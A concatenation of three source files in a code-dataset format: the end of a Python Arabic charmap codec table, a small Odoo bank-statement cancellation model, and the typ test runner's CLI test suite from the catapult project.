'\u064b' # 0xEB -> ARABIC FATHATAN
'\u064c' # 0xEC -> ARABIC DAMMATAN
'\u064d' # 0xED -> ARABIC KASRATAN
'\u064e' # 0xEE -> ARABIC FATHA
'\u064f' # 0xEF -> ARABIC DAMMA
'\u0650' # 0xF0 -> ARABIC KASRA
'\u0651' # 0xF1 -> ARABIC SHADDA
'\u0652' # 0xF2 -> ARABIC SUKUN
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
)
### Encoding table
encoding_table=codecs.charmap_build(decoding_table)
|
wangjun/odoo | refs/heads/8.0 | addons/account_cancel/models/account_bank_statement.py | 96 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from openerp import models, api, _
from openerp.exceptions import Warning
class BankStatement(models.Model):
_inherit = 'account.bank.statement'
@api.multi
def button_draft(self):
self.state = 'draft'
class BankStatementLine(models.Model):
_inherit = 'account.bank.statement.line'
@api.multi
def cancel(self):
for line in self:
if line.statement_id.state == 'confirm':
raise Warning(_("Please set the bank statement to New before canceling."))
return super(BankStatementLine, self).cancel()
|
catapult-project/catapult | refs/heads/master | third_party/typ/typ/tests/main_test.py | 3 | # Copyright 2014 Dirk Pranke. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import io
import json
import os
import sys
import textwrap
from typ import main
from typ import test_case
from typ import Host
from typ import VERSION
from typ.fakes import test_result_server_fake
from typ.fakes import host_fake
is_python3 = bool(sys.version_info.major == 3)
if is_python3: # pragma: python3
# pylint: disable=redefined-builtin,invalid-name
unicode = str
d = textwrap.dedent
ARTIFACTS_TEST_PY = """
import unittest
import os
from typ import test_case
class ArtifactTest(test_case.TestCase):
def test_produce_artifact_for_retries(self):
self.artifacts.CreateArtifact('artifact_name', 'test.txt', 'content')
self.fail()
"""
FLAKY_TEST_PY = """
import unittest
class FlakyTest(unittest.TestCase):
_retry_count = 0
def test_flaky(self):
cls = self.__class__
if cls._retry_count < 3:
cls._retry_count += 1
self.fail()
return
"""
SKIP_TEST_PY = """
import unittest
class SkipTest(unittest.TestCase):
def test_skip(self):
self.skipTest('SKIPPING TEST')
"""
SKIP_TEST_FILES = {'skip_test.py': SKIP_TEST_PY}
PASS_TEST_PY = """
import unittest
import time
class PassingTest(unittest.TestCase):
def test_pass(self):
# Add sleep to make the time assertion in
# main_test.TestCli.test_write_full_results_to not flaky.
time.sleep(0.1)
pass
"""
PASS_TEST_FILES = {'pass_test.py': PASS_TEST_PY}
FAIL_TEST_PY = """
import unittest
class FailingTest(unittest.TestCase):
def test_fail(self):
self.fail()
"""
FAIL_TEST_FILES = {'fail_test.py': FAIL_TEST_PY}
OUTPUT_TEST_PY = """
import sys
import unittest
class PassTest(unittest.TestCase):
def test_out(self):
sys.stdout.write("hello on stdout\\n")
sys.stdout.flush()
def test_err(self):
sys.stderr.write("hello on stderr\\n")
class FailTest(unittest.TestCase):
def test_out_err_fail(self):
sys.stdout.write("hello on stdout\\n")
sys.stdout.flush()
sys.stderr.write("hello on stderr\\n")
self.fail()
"""
OUTPUT_TEST_FILES = {'output_test.py': OUTPUT_TEST_PY}
SF_TEST_PY = """
import sys
import unittest
class SkipMethods(unittest.TestCase):
@unittest.skip('reason')
def test_reason(self):
self.fail()
@unittest.skipIf(True, 'reason')
def test_skip_if_true(self):
self.fail()
@unittest.skipIf(False, 'reason')
def test_skip_if_false(self):
self.fail()
class SkipSetup(unittest.TestCase):
def setUp(self):
self.skipTest('setup failed')
def test_notrun(self):
self.fail()
@unittest.skip('skip class')
class SkipClass(unittest.TestCase):
def test_method(self):
self.fail()
class SetupClass(unittest.TestCase):
@classmethod
def setUpClass(cls):
sys.stdout.write('in setupClass\\n')
sys.stdout.flush()
assert False, 'setupClass failed'
def test_method1(self):
pass
def test_method2(self):
pass
class ExpectedFailures(unittest.TestCase):
@unittest.expectedFailure
def test_fail(self):
self.fail()
@unittest.expectedFailure
def test_pass(self):
pass
"""
SF_TEST_FILES = {'sf_test.py': SF_TEST_PY}
LOAD_TEST_PY = """
import unittest
class BaseTest(unittest.TestCase):
pass
def method_fail(self):
self.fail()
def method_pass(self):
pass
def load_tests(_, _2, _3):
setattr(BaseTest, "a/b/fail", method_fail)
setattr(BaseTest, "a/b/pass", method_pass)
suite = unittest.TestSuite()
suite.addTest(BaseTest("a/b/fail"))
suite.addTest(BaseTest("a/b/pass"))
return suite
"""
LOAD_TEST_FILES = {'load_test.py': LOAD_TEST_PY}
path_to_main = os.path.join(
os.path.dirname(os.path.dirname(os.path.abspath(__file__))),
'runner.py')
class TestCli(test_case.MainTestCase):
prog = [sys.executable, path_to_main]
files_to_ignore = ['*.pyc']
def test_bad_arg(self):
self.check(['--bad-arg'], ret=2, out='',
rerr='.*: error: unrecognized arguments: --bad-arg\n')
self.check(['-help'], ret=2, out='',
rerr=(".*: error: argument -h/--help: "
"ignored explicit argument 'elp'\n"))
def test_bad_metadata(self):
self.check(['--metadata', 'foo'], ret=2, err='',
out='Error: malformed --metadata "foo"\n')
def test_basic(self):
self.check([], files=PASS_TEST_FILES,
ret=0,
out=('[1/1] pass_test.PassingTest.test_pass passed\n'
'1 test passed, 0 skipped, 0 failures.\n'), err='')
def test_coverage(self):
# TODO(crbug.com/1217850): Figure out why this isn't working
# in py3. Do we need to update coverage?
if sys.version_info.major == 3:
return
try:
import coverage # pylint: disable=W0612
files = {
'pass_test.py': PASS_TEST_PY,
'fail_test.py': FAIL_TEST_PY,
}
self.check(['-c', 'pass_test'], files=files, ret=0, err='',
out=d("""\
[1/1] pass_test.PassingTest.test_pass passed
1 test passed, 0 skipped, 0 failures.
Name Stmts Miss Cover
----------------------------------
fail_test.py 4 4 0%
pass_test.py 6 0 100%
----------------------------------
TOTAL 10 4 60%
"""))
except ImportError: # pragma: no cover
# We can never cover this line, since running coverage means
# that import will succeed.
self.check(['-c'], files=PASS_TEST_FILES, ret=1,
out='Error: coverage is not installed.\n', err='')
def test_debugger(self):
if sys.version_info.major == 3: # pragma: python3
return
else: # pragma: python2
_, out, _, _ = self.check(['-d'], stdin='quit()\n',
files=PASS_TEST_FILES, ret=0, err='')
self.assertIn('(Pdb) ', out)
def test_dryrun(self):
self.check(['-n'], files=PASS_TEST_FILES, ret=0, err='',
out=d("""\
[1/1] pass_test.PassingTest.test_pass passed
1 test passed, 0 skipped, 0 failures.
"""))
def test_error(self):
files = {'err_test.py': d("""\
import unittest
class ErrTest(unittest.TestCase):
def test_err(self):
foo = bar
""")}
_, out, _, _ = self.check([''], files=files, ret=1, err='')
self.assertIn('[1/1] err_test.ErrTest.test_err failed unexpectedly',
out)
self.assertIn('0 tests passed, 0 skipped, 1 failure', out)
def test_pass_repeat(self):
self.check(
['--repeat', '2'], files=PASS_TEST_FILES, ret=0, err='',
out=d("""\
[1/2] pass_test.PassingTest.test_pass passed
[2/2] pass_test.PassingTest.test_pass passed
1 test passed, 0 skipped, 0 failures.
"""))
def test_expectations(self):
files = {
'expectations.txt': d('''\
# tags: [ foo bar ]
# results: [ Failure ]
crbug.com/12345 [ foo ] fail_test.FailingTest.test_fail [ Failure ]
'''),
'fail_test.py': FAIL_TEST_PY,
}
# No tags are passed, so this should fail unexpectedly.
#_, out, _, _ = self.check(['-X', 'expectations.txt'],
# files=files, ret=1)
# A matching tag is passed, so the test should fail as expected.
self.check(['-X', 'expectations.txt', '-x', 'foo'], files=files, ret=0)
# A tag that doesn't match is passed, so the test should fail
# unexpectedly.
self.check(['-X', 'expectations.txt', '-x', 'bar'], files=files, ret=1)
# Passing a tag without an expectations file doesn't make sense.
self.check(['-x', 'bar'], files=files, ret=1)
def test_expectations_with_globs(self):
files = {
'expectations.txt': d('''\
# results: [ Failure ]
crbug.com/12345 fail_test.FailingTest.* [ Failure ]
'''),
'fail_test.py': FAIL_TEST_PY,
}
self.check(['-X', 'expectations.txt'], files=files, ret=0)
def test_multiple_expectations_files_do_not_work(self):
files = {
'expectations_1.txt': d('''\
# tags: [ foo bar ]
# results: [ Failure ]
crbug.com/12345 [ foo ] fail_test.FailingTest.test_fail [ Failure ]
'''),
'expectations_2.txt': d('''\
# tags: [ foo bar ]
# results: [ Skip ]
crbug.com/12345 [ foo ] fail_test.FailingTest.test_skip [ Skip ]
'''),
'fail_test.py': FAIL_TEST_PY,
}
# This isn't supported yet.
self.check(['-X', 'expectations_1.txt', '-X', 'expectations_2.txt',
'-x', 'foo'], files=files, ret=1)
def test_expectations_file_has_syntax_error(self):
files = {
'expectations.txt': d('''\
# tags: [
crbug.com/12345 [ foo ] fail_test.FailingTest.test_fail [ Failure ]
'''),
'fail_test.py': FAIL_TEST_PY,
}
self.check(['-X', 'expectations.txt', '-x', 'foo'], files=files, ret=1)
def test_fail(self):
_, out, _, _ = self.check([], files=FAIL_TEST_FILES, ret=1, err='')
self.assertIn('fail_test.FailingTest.test_fail failed unexpectedly',
out)
def test_fail_repeat(self):
_, out, _, _ = self.check(
['--repeat', '2'], files=FAIL_TEST_FILES, ret=1, err='')
self.assertIn(
'[1/2] fail_test.FailingTest.test_fail failed unexpectedly', out)
self.assertIn(
'[2/2] fail_test.FailingTest.test_fail failed unexpectedly', out)
def test_fail_then_pass(self):
files = {'fail_then_pass_test.py': d("""\
import unittest
count = 0
class FPTest(unittest.TestCase):
def test_count(self):
global count
count += 1
if count == 1:
self.fail()
""")}
_, out, _, files = self.check(['--retry-limit', '3',
'--write-full-results-to',
'full_results.json'],
files=files, ret=0, err='')
self.assertIn('Retrying failed tests (attempt #1 of 3)', out)
self.assertNotIn('Retrying failed tests (attempt #2 of 3)', out)
self.assertIn('1 test passed, 0 skipped, 0 failures.\n', out)
results = json.loads(files['full_results.json'])
self.assertEqual(
results['tests'][
'fail_then_pass_test']['FPTest']['test_count']['actual'],
'FAIL PASS')
def test_fail_then_pass_repeat(self):
files = {'fail_then_pass_test.py': d("""\
import unittest
count = 0
class FPTest(unittest.TestCase):
def test_count(self):
global count
count += 1
if count % 2 == 1:
self.fail()
""")}
_, out, _, files = self.check(['--retry-limit', '3',
'--write-full-results-to',
'full_results.json',
'--repeat', '2'],
files=files, ret=0, err='')
results = json.loads(files['full_results.json'])
self.assertIn('Retrying failed tests (attempt #1 of 3)', out)
self.assertNotIn('Retrying failed tests (attempt #2 of 3)', out)
self.assertEqual(
results['tests'][
'fail_then_pass_test']['FPTest']['test_count']['actual'],
'FAIL PASS FAIL PASS')
def test_fail_then_skip(self):
files = {'fail_then_skip_test.py': d("""\
import unittest
count = 0
class FPTest(unittest.TestCase):
def test_count(self):
global count
count += 1
if count == 1:
self.fail()
elif count == 2:
self.skipTest('')
""")}
_, out, _, files = self.check(['--retry-limit', '3',
'--write-full-results-to',
'full_results.json'],
files=files, ret=0, err='')
self.assertIn('Retrying failed tests (attempt #1 of 3)', out)
self.assertNotIn('Retrying failed tests (attempt #2 of 3)', out)
self.assertIn('0 tests passed, 1 skipped, 0 failures.\n', out)
results = json.loads(files['full_results.json'])
self.assertEqual(
results['tests'][
'fail_then_skip_test']['FPTest']['test_count']['actual'],
'FAIL SKIP')
def test_failures_are_not_elided(self):
_, out, _, _ = self.check(['--terminal-width=20'],
files=FAIL_TEST_FILES, ret=1, err='')
self.assertIn('[1/1] fail_test.FailingTest.test_fail failed '
'unexpectedly:\n', out)
def test_file_list(self):
files = PASS_TEST_FILES
self.check(['-f', '-'], files=files, stdin='pass_test\n', ret=0)
self.check(['-f', '-'], files=files, stdin='pass_test.PassingTest\n',
ret=0)
self.check(['-f', '-'], files=files,
stdin='pass_test.PassingTest.test_pass\n',
ret=0)
files = {'pass_test.py': PASS_TEST_PY,
'test_list.txt': 'pass_test.PassingTest.test_pass\n'}
self.check(['-f', 'test_list.txt'], files=files, ret=0)
def test_find(self):
files = PASS_TEST_FILES
self.check(['-l'], files=files, ret=0,
out='pass_test.PassingTest.test_pass\n')
self.check(['-l', 'pass_test'], files=files, ret=0, err='',
out='pass_test.PassingTest.test_pass\n')
self.check(['-l', 'pass_test.py'], files=files, ret=0, err='',
out='pass_test.PassingTest.test_pass\n')
self.check(['-l', './pass_test.py'], files=files, ret=0, err='',
out='pass_test.PassingTest.test_pass\n')
self.check(['-l', '.'], files=files, ret=0, err='',
out='pass_test.PassingTest.test_pass\n')
self.check(['-l', 'pass_test.PassingTest.test_pass'], files=files,
ret=0, err='',
out='pass_test.PassingTest.test_pass\n')
self.check(['-l', '.'], files=files, ret=0, err='',
out='pass_test.PassingTest.test_pass\n')
def test_find_from_subdirs(self):
files = {
'foo/__init__.py': '',
'foo/pass_test.py': PASS_TEST_PY,
'bar/__init__.py': '',
'bar/tmp': '',
}
self.check(['-l', '../foo/pass_test.py'], files=files, cwd='bar',
ret=0, err='',
out='foo.pass_test.PassingTest.test_pass\n')
self.check(['-l', 'foo'], files=files, cwd='bar',
ret=0, err='',
out='foo.pass_test.PassingTest.test_pass\n')
self.check(['-l', '--path', '../foo', 'pass_test'],
files=files, cwd='bar', ret=0, err='',
out='pass_test.PassingTest.test_pass\n')
def test_multiple_top_level_dirs(self):
files = {
'foo/bar/__init__.py': '',
'foo/bar/pass_test.py': PASS_TEST_PY,
'baz/quux/__init__.py': '',
'baz/quux/second_test.py': PASS_TEST_PY,
}
self.check(['-l', 'foo/bar', 'baz/quux'], files=files,
ret=0, err='',
out=(
'bar.pass_test.PassingTest.test_pass\n'
'quux.second_test.PassingTest.test_pass\n'
))
self.check(['-l', 'foo/bar/pass_test.py', 'baz/quux'], files=files,
ret=0, err='',
out=(
'bar.pass_test.PassingTest.test_pass\n'
'quux.second_test.PassingTest.test_pass\n'
))
self.check(['-l', '--top-level-dirs', 'foo', '--top-level-dirs', 'baz'],
files=files,
ret=0, err='',
out=(
'bar.pass_test.PassingTest.test_pass\n'
'quux.second_test.PassingTest.test_pass\n'
))
def test_list_with_repeat(self):
files = {
'foo/bar/__init__.py': '',
'foo/bar/pass_test.py': PASS_TEST_PY,
'baz/quux/__init__.py': '',
'baz/quux/second_test.py': PASS_TEST_PY,
}
self.check(['-l', 'foo/bar', 'baz/quux', '--repeat', '10'],
files=files,
ret=0, err='',
out=(
'bar.pass_test.PassingTest.test_pass\n'
'quux.second_test.PassingTest.test_pass\n'
))
def test_single_top_level_dir(self):
files = {
'foo/bar/__init__.py': '',
'foo/bar/pass_test.py': PASS_TEST_PY,
'baz/quux/__init__.py': '',
'baz/quux/second_test.py': PASS_TEST_PY,
}
self.check(['-l', '--top-level-dir', 'foo'],
files=files,
ret=0, err='',
out=(
'bar.pass_test.PassingTest.test_pass\n'
))
def test_can_not_have_both_top_level_flags(self):
files = {
'foo/bar/__init__.py': '',
'foo/bar/pass_test.py': PASS_TEST_PY,
'baz/quux/__init__.py': '',
'baz/quux/second_test.py': PASS_TEST_PY,
}
self.check(
['-l', '--top-level-dir', 'foo', '--top-level-dirs', 'bar'],
files=files,
ret=1, out='',
err='Cannot specify both --top-level-dir and --top-level-dirs\n')
def test_help(self):
self.check(['--help'], ret=0, rout='.*', err='')
def test_import_failure_missing_file(self):
_, out, _, _ = self.check(['-l', 'foo'], ret=1, err='')
self.assertIn('Failed to load "foo" in find_tests', out)
self.assertIn('No module named', out)
def test_import_failure_missing_package(self):
files = {'foo.py': d("""\
import unittest
import package_that_does_not_exist
class ImportFailureTest(unittest.TestCase):
def test_case(self):
pass
""")}
_, out, _, _ = self.check(['-l', 'foo.py'], files=files, ret=1, err='')
self.assertIn('Failed to load "foo.py" in find_tests', out)
self.assertIn('No module named', out)
def test_import_failure_no_tests(self):
files = {'foo.py': 'import unittest'}
self.check(['-l', 'foo'], files=files, ret=0, err='',
out='\n')
def test_import_failure_syntax_error(self):
files = {'syn_test.py': d("""\
import unittest
class SyntaxErrorTest(unittest.TestCase):
def test_syntax_error_in_test(self):
syntax error
""")}
_, out, _, _ = self.check([], files=files, ret=1, err='')
self.assertIn('Failed to import test module: syn_test', out)
self.assertIn('SyntaxError: invalid syntax', out)
def test_interrupt(self):
files = {'interrupt_test.py': d("""\
import unittest
class Foo(unittest.TestCase):
def test_interrupt(self):
raise KeyboardInterrupt()
""")}
self.check(['-j', '1'], files=files, ret=130, out='',
err='interrupted, exiting\n')
def test_isolate(self):
self.check(['--isolate', '*test_pass*'], files=PASS_TEST_FILES, ret=0,
out=('[1/1] pass_test.PassingTest.test_pass passed\n'
'1 test passed, 0 skipped, 0 failures.\n'), err='')
def test_load_tests_failure(self):
files = {'foo_test.py': d("""\
import unittest
def load_tests(_, _2, _3):
raise ValueError('this should fail')
""")}
_, out, _, _ = self.check([], files=files, ret=1, err='')
self.assertIn('this should fail', out)
def test_load_tests_single_worker(self):
files = LOAD_TEST_FILES
_, out, _, _ = self.check([
'-j', '1', '-v', '--test-name-prefix',
'load_test.BaseTest.'], files=files, ret=1, err='')
self.assertIn('[1/2] a/b/fail failed', out)
self.assertIn('[2/2] a/b/pass passed', out)
self.assertIn('1 test passed, 0 skipped, 1 failure.\n', out)
def test_load_tests_multiple_workers(self):
# TODO(crbug.com/1217853) Figure out why this isn't working under
# py3 and/or possibly running in parallel on mac.
if sys.platform in ('darwin', 'win32'):
return
_, out, _, _ = self.check([], files=LOAD_TEST_FILES, ret=1, err='')
# The output for this test is nondeterministic since we may run
# two tests in parallel. So, we just test that some of the substrings
# we care about are present.
self.assertIn('a/b/pass passed', out)
self.assertIn('a/b/fail failed', out)
self.assertIn('1 test passed, 0 skipped, 1 failure.\n', out)
def test_missing_builder_name(self):
self.check(['--test-results-server', 'localhost'], ret=2,
out=('Error: --builder-name must be specified '
'along with --test-result-server\n'
'Error: --master-name must be specified '
'along with --test-result-server\n'
'Error: --test-type must be specified '
'along with --test-result-server\n'), err='')
def test_ninja_status_env(self):
self.check(['-v', 'output_test.PassTest.test_out'],
files=OUTPUT_TEST_FILES, aenv={'NINJA_STATUS': 'ns: '},
out=d("""\
ns: output_test.PassTest.test_out passed
1 test passed, 0 skipped, 0 failures.
"""), err='')
def test_output_for_failures(self):
_, out, _, _ = self.check(['output_test.FailTest'],
files=OUTPUT_TEST_FILES,
ret=1, err='')
self.assertIn('[1/1] output_test.FailTest.test_out_err_fail '
'failed unexpectedly:\n'
' hello on stdout\n'
' hello on stderr\n', out)
def test_quiet(self):
self.check(['-q'], files=PASS_TEST_FILES, ret=0, err='', out='')
def test_retry_limit(self):
_, out, _, _ = self.check(['--retry-limit', '2'],
files=FAIL_TEST_FILES, ret=1, err='')
self.assertIn('Retrying failed tests', out)
lines = out.splitlines()
self.assertEqual(len([l for l in lines
if 'test_fail failed unexpectedly:' in l]),
3)
def test_skip(self):
_, out, _, _ = self.check(['--skip', '*test_fail*'],
files=FAIL_TEST_FILES, ret=0)
self.assertIn('0 tests passed, 1 skipped, 0 failures.', out)
files = {'fail_test.py': FAIL_TEST_PY,
'pass_test.py': PASS_TEST_PY}
self.check(['-j', '1', '--skip', '*test_fail*'], files=files, ret=0,
out=('[1/2] fail_test.FailingTest.test_fail was skipped\n'
'[2/2] pass_test.PassingTest.test_pass passed\n'
'1 test passed, 1 skipped, 0 failures.\n'), err='')
# This tests that we print test_started updates for skipped tests
# properly. It also tests how overwriting works.
_, out, _, _ = self.check(['-j', '1', '--overwrite', '--skip',
'*test_fail*'], files=files, ret=0,
err='', universal_newlines=False)
# We test this string separately and call out.strip() to
# avoid the trailing \r\n we get on windows, while keeping
# the \r's elsewhere in the string.
self.assertMultiLineEqual(
out.strip(),
('[0/2] fail_test.FailingTest.test_fail\r'
' \r'
'[1/2] fail_test.FailingTest.test_fail was skipped\r'
' \r'
'[1/2] pass_test.PassingTest.test_pass\r'
' \r'
'[2/2] pass_test.PassingTest.test_pass passed\r'
' \r'
'1 test passed, 1 skipped, 0 failures.'))
def test_skip_via_expectations(self):
files = {'expectations.txt':
'# results: [ Skip ]\ncrbug.com/23456 fail_test.FailingTest.test_fail [ Skip ]\n',
'fail_test.py': FAIL_TEST_PY,
'pass_test.py': PASS_TEST_PY}
self.check(['-X', 'expectations.txt'], files=files, ret=0)
def test_skips_and_failures(self):
_, out, _, _ = self.check(['-j', '1', '-v', '-v'], files=SF_TEST_FILES,
ret=1, err='')
# We do a bunch of assertIn()'s to work around the non-portable
# tracebacks.
self.assertIn(('[1/9] sf_test.ExpectedFailures.test_fail failed as expected:\n'
' Traceback '), out)
self.assertIn(('[2/9] sf_test.ExpectedFailures.test_pass '
'passed unexpectedly'), out)
self.assertIn(('[3/9] sf_test.SetupClass.test_method1 '
'failed unexpectedly:\n'
' in setupClass\n'), out)
self.assertIn(('[4/9] sf_test.SetupClass.test_method2 '
'failed unexpectedly:\n'
' in setupClass\n'), out)
self.assertIn(('[5/9] sf_test.SkipClass.test_method was skipped:\n'
' skip class\n'), out)
self.assertIn(('[6/9] sf_test.SkipMethods.test_reason was skipped:\n'
' reason\n'), out)
self.assertIn(('[7/9] sf_test.SkipMethods.test_skip_if_false '
'failed unexpectedly:\n'
' Traceback'), out)
self.assertIn(('[8/9] sf_test.SkipMethods.test_skip_if_true '
'was skipped:\n'
' reason\n'
'[9/9] sf_test.SkipSetup.test_notrun was skipped:\n'
' setup failed\n'
'1 test passed, 4 skipped, 4 failures.\n'), out)
def test_skip_and_all(self):
# --all should override --skip
_, out, _, _ = self.check(['--skip', '*test_pass'],
files=PASS_TEST_FILES, ret=0, err='')
self.assertIn('0 tests passed, 1 skipped, 0 failures.', out)
_, out, _, _ = self.check(['--all', '--skip', '*test_pass'],
files=PASS_TEST_FILES, ret=0, err='')
self.assertIn('1 test passed, 0 skipped, 0 failures.', out)
def test_skip_decorators_and_all(self):
_, out, _, _ = self.check(['--all', '-j', '1', '-v', '-v'],
files=SF_TEST_FILES, ret=1, err='')
self.assertIn('sf_test.SkipClass.test_method failed', out)
self.assertIn('sf_test.SkipMethods.test_reason failed', out)
self.assertIn('sf_test.SkipMethods.test_skip_if_true failed', out)
self.assertIn('sf_test.SkipMethods.test_skip_if_false failed', out)
# --all does not override explicit calls to skipTest(), only
# the decorators.
self.assertIn('sf_test.SkipSetup.test_notrun was skipped', out)
def test_sharding(self):
def run(shard_index, total_shards, tests):
files = {'shard_test.py': textwrap.dedent(
"""\
import unittest
class ShardTest(unittest.TestCase):
def test_01(self):
pass
def test_02(self):
pass
def test_03(self):
pass
def test_04(self):
pass
def test_05(self):
pass
""")}
_, out, _, _ = self.check(
['--shard-index', str(shard_index),
'--total-shards', str(total_shards),
'--jobs', '1'],
files=files)
exp_out = ''
total_tests = len(tests)
for i, test in enumerate(tests):
exp_out += ('[%d/%d] shard_test.ShardTest.test_%s passed\n' %
(i + 1, total_tests, test))
exp_out += '%d test%s passed, 0 skipped, 0 failures.\n' % (
total_tests, "" if total_tests == 1 else "s")
self.assertEqual(out, exp_out)
run(0, 1, ['01', '02', '03', '04', '05'])
run(0, 2, ['01', '03', '05'])
run(1, 2, ['02', '04'])
run(0, 6, ['01'])
def test_subdir(self):
files = {
'foo/__init__.py': '',
'foo/bar/__init__.py': '',
'foo/bar/pass_test.py': PASS_TEST_PY
}
self.check(['foo/bar'], files=files, ret=0, err='',
out=d("""\
[1/1] foo.bar.pass_test.PassingTest.test_pass passed
1 test passed, 0 skipped, 0 failures.
"""))
def test_timing(self):
self.check(['-t'], files=PASS_TEST_FILES, ret=0, err='',
rout=(r'\[1/1\] pass_test.PassingTest.test_pass passed '
r'\d+.\d+s\n'
r'1 test passed in \d+.\d+s, 0 skipped, 0 failures.'))
def test_test_results_server(self):
# TODO(crbug.com/1217853) Figure out why this isn't working under
# py3 (and/or possibly running in parallel on mac).
if sys.platform in ('darwin', 'win32'):
return
server = test_result_server_fake.start()
self.assertNotEqual(server, None, 'could not start fake server')
try:
self.check(['--test-results-server',
'http://%s:%d' % server.server_address,
'--master-name', 'fake_master',
'--builder-name', 'fake_builder',
'--test-type', 'typ_tests',
'--metadata', 'foo=bar'],
files=PASS_TEST_FILES, ret=0, err='',
out=('[1/1] pass_test.PassingTest.test_pass passed\n'
'1 test passed, 0 skipped, 0 failures.\n'))
finally:
posts = server.stop()
self.assertEqual(len(posts), 1)
payload = posts[0][2].decode('utf8')
self.assertIn('"test_pass": {"expected": "PASS", "actual": "PASS"',
payload)
self.assertTrue(payload.endswith('--\r\n'))
self.assertNotEqual(server.log.getvalue(), '')
# TODO(crbug.com/1032848) The typ unit tests hang whenever they run on
# mac with multiple processes. We need to investigate the root cause
# and fix it.
def disabled_test_test_results_server_error(self):
server = test_result_server_fake.start(code=500)
self.assertNotEqual(server, None, 'could not start fake server')
try:
self.check(['--test-results-server',
'http://%s:%d' % server.server_address,
'--master-name', 'fake_master',
'--builder-name', 'fake_builder',
'--test-type', 'typ_tests',
'--metadata', 'foo=bar'],
files=PASS_TEST_FILES, ret=1, err='',
out=('[1/1] pass_test.PassingTest.test_pass passed\n'
'1 test passed, 0 skipped, 0 failures.\n'
'Uploading the JSON results raised '
'"HTTP Error 500: Internal Server Error"\n'))
finally:
_ = server.stop()
# TODO(crbug.com/1032848) The typ unit tests hang whenever they run on
# mac with multiple processes. We need to investigate the root cause
# and fix it.
def disabled_test_test_results_server_not_running(self):
self.check(['--test-results-server', 'http://localhost:99999',
'--master-name', 'fake_master',
'--builder-name', 'fake_builder',
'--test-type', 'typ_tests',
'--metadata', 'foo=bar'],
files=PASS_TEST_FILES, ret=1, err='',
rout=(r'\[1/1\] pass_test.PassingTest.test_pass passed\n'
'1 test passed, 0 skipped, 0 failures.\n'
'Uploading the JSON results raised .*\n'))
def test_unexpected_skip(self):
files = {
'expectations.txt':
'# results: [ Pass ]\ncrbug.com/23456 skip_test.SkipSetup.test_notrun [ Pass ]\n',
'skip_test.py': SF_TEST_PY
}
_, out, _, _ = self.check(['-X', 'expectations.txt',
'skip_test.SkipSetup.test_notrun'],
files=files, ret=1, err='')
self.assertIn('skip_test.SkipSetup.test_notrun was skipped unexpectedly'
,out)
def test_retry_only_retry_on_failure_tests(self):
files = {'flaky_test.py': FLAKY_TEST_PY}
_, out, _, files = self.check(['--write-full-results-to',
'full_results.json',
'--retry-limit','6',
'--retry-only-retry-on-failure-tests'],
files=files, ret=1, err='')
self.assertIn('[1/1] flaky_test.FlakyTest.test_flaky failed unexpectedly:\n',
out)
self.assertNotIn('[1/1] flaky_test.FlakyTest.test_flaky passed\n',
out)
self.assertIn('0 tests passed, 0 skipped, 1 failure.\n', out)
results = json.loads(files['full_results.json'])
results = results['tests']['flaky_test']['FlakyTest']['test_flaky']
self.assertEqual(results['actual'],'FAIL')
self.assertEqual(results['expected'],'PASS')
self.assertIn('is_unexpected', results)
self.assertIn('is_regression', results)
def test_retryonfailure_test_fails(self):
files = {'fail_test.py': FAIL_TEST_PY,
'expectations.txt': d("""\
# tags: [ Foo ]
# tags: [ Bar ]
# results: [ RetryOnFailure ]
crbug.com/12345 [ foo bar ] test_fail [ retryonfailure ]
""")}
_, out, _, files = self.check(['--write-full-results-to',
'full_results.json',
'-X', 'expectations.txt',
'-x', 'Foo',
'-x', 'Bar',
'--retry-limit', '3',
'--retry-only-retry-on-failure-tests',
'--test-name-prefix',
'fail_test.FailingTest.'],
files=files, ret=1, err='')
self.assertIn('[1/1] test_fail failed unexpectedly:\n',
out)
self.assertIn('0 tests passed, 0 skipped, 1 failure.\n', out)
results = json.loads(files['full_results.json'])
results = results['tests']['test_fail']
self.assertEqual(results['actual'],'FAIL FAIL FAIL FAIL')
self.assertEqual(results['expected'],'PASS')
self.assertIn('is_unexpected', results)
self.assertIn('is_regression', results)
def test_retryonfailure_test_passes(self):
files = {'flaky_test.py': FLAKY_TEST_PY,
'expectations.txt': d("""\
# tags: [ foo bar ]
# results: [ RetryOnFailure ]
crbug.com/12345 [ foo ] flaky_test.FlakyTest.test_flaky [ RetryOnFailure ]
""")}
_, out, _, files = self.check(['--write-full-results-to',
'full_results.json',
'-X', 'expectations.txt',
'-x', 'foo',
'--retry-limit','6',
'--retry-only-retry-on-failure-tests'],
files=files, ret=0, err='')
self.assertIn('[1/1] flaky_test.FlakyTest.test_flaky failed unexpectedly:\n',
out)
self.assertIn('[1/1] flaky_test.FlakyTest.test_flaky passed\n',
out)
self.assertIn('1 test passed, 0 skipped, 0 failures.\n', out)
results = json.loads(files['full_results.json'])
results = results['tests']['flaky_test']['FlakyTest']['test_flaky']
self.assertEqual(results['actual'],'FAIL FAIL FAIL PASS')
self.assertEqual(results['expected'],'PASS')
self.assertNotIn('is_unexpected', results)
self.assertNotIn('is_regression', results)
def test_retryonfailure_test_fails_no_regression(self):
files = {'fail_test.py': FAIL_TEST_PY,
'expectations.txt': d("""\
# tags: [ foo bar ]
# results: [ RetryOnFailure Failure ]
crbug.com/12345 [ foo ] fail_test.FailingTest.test_fail [ RetryOnFailure Failure ]
""")}
_, out, _, files = self.check(['--write-full-results-to',
'full_results.json',
'-X', 'expectations.txt',
'-x', 'foo',
'-x', 'bar',
'--retry-limit', '3',
'--retry-only-retry-on-failure-tests', '-vv'],
files=files, ret=0, err='')
self.assertIn('[1/1] fail_test.FailingTest.test_fail failed as expected:\n',
out)
self.assertIn('0 tests passed, 0 skipped, 1 failure.\n', out)
results = json.loads(files['full_results.json'])
test_results = results['tests']['fail_test']['FailingTest']['test_fail']
self.assertEqual(test_results['actual'],'FAIL FAIL FAIL FAIL')
self.assertEqual(test_results['expected'],'FAIL')
